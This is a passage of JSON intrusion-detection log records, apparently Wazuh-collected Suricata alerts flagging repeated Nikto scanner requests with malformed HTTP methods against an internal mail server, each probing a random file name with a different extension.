character","id":"86601","firedtimes":64,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.103002","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.541676+0000\",\"flow_id\":2236672922763369,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47064,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.se\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.541676+0000","flow_id":"2236672922763369.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47064","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.se","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.543712+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":65,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.104539","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.543712+0000\",\"flow_id\":2.23652689387752e+15,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47066,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.js\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.543712+0000","flow_id":"2236526893877520.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47066","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.js","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.546419+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":66,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.106080","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.546419+0000\",\"flow_id\":565934939591600,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47068,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.pl\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.546419+0000","flow_id":"565934939591600.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47068","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.pl","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.549896+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":67,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.107615","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.549896+0000\",\"flow_id\":203104692363407,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47070,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.iso2022-jp\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.549896+0000","flow_id":"203104692363407.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47070","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.iso2022-jp","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.553708+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":68,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.109166","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.553708+0000\",\"flow_id\":1482309161872368,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47072,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.es\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.553708+0000","flow_id":"1482309161872368.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47072","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.es","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.556583+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":69,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.110703","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.556583+0000\",\"flow_id\":993915545746050,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47074,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.utf8\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.556583+0000","flow_id":"993915545746050.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47074","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.utf8","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.570703+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":70,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.112242","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.570703+0000\",\"flow_id\":304066488610493,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47076,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.php=\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.570703+0000","flow_id":"304066488610493.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47076","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.php=","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.575638+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":71,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.113781","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.575638+0000\",\"flow_id\":1484675688873005,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47078,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.dk\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.575638+0000","flow_id":"1484675688873005.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47078","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.dk","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.578131+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":72,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.115318","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.578131+0000\",\"flow_id\":1753841289317738,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47080,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.php4\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.578131+0000","flow_id":"1753841289317738.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47080","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.php4","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.581866+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":73,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.116859","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.581866+0000\",\"flow_id\":1.17482386324625e+15,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47082,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.sh\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.581866+0000","flow_id":"1174823863246250.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47082","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.sh","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.585321+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":74,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.118400","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.585321+0000\",\"flow_id\":1629124028984059,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47084,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.cfc\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.585321+0000","flow_id":"1629124028984059.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47084","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.cfc","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.588333+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":75,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.119939","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.588333+0000\",\"flow_id\":1.72249232303402e+15,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47086,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.jse\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.588333+0000","flow_id":"1722492323034020.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47086","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.jse","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.590216+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":76,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.121482","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.590216+0000\",\"flow_id\":479451478163037,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47088,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.nlm\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.590216+0000","flow_id":"479451478163037.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47088","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.nlm","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.592132+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":77,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.123019","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.592132+0000\",\"flow_id\":88759778018679,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47090,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.printer\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.592132+0000","flow_id":"88759778018679.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47090","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.printer","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.594670+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":78,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.124562","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.594670+0000\",\"flow_id\":560166798495674,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47092,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.1\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.594670+0000","flow_id":"560166798495674.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47092","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.1","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.599159+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":79,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.126095","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.599159+0000\",\"flow_id\":1422785210098109,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47094,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.pwd\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
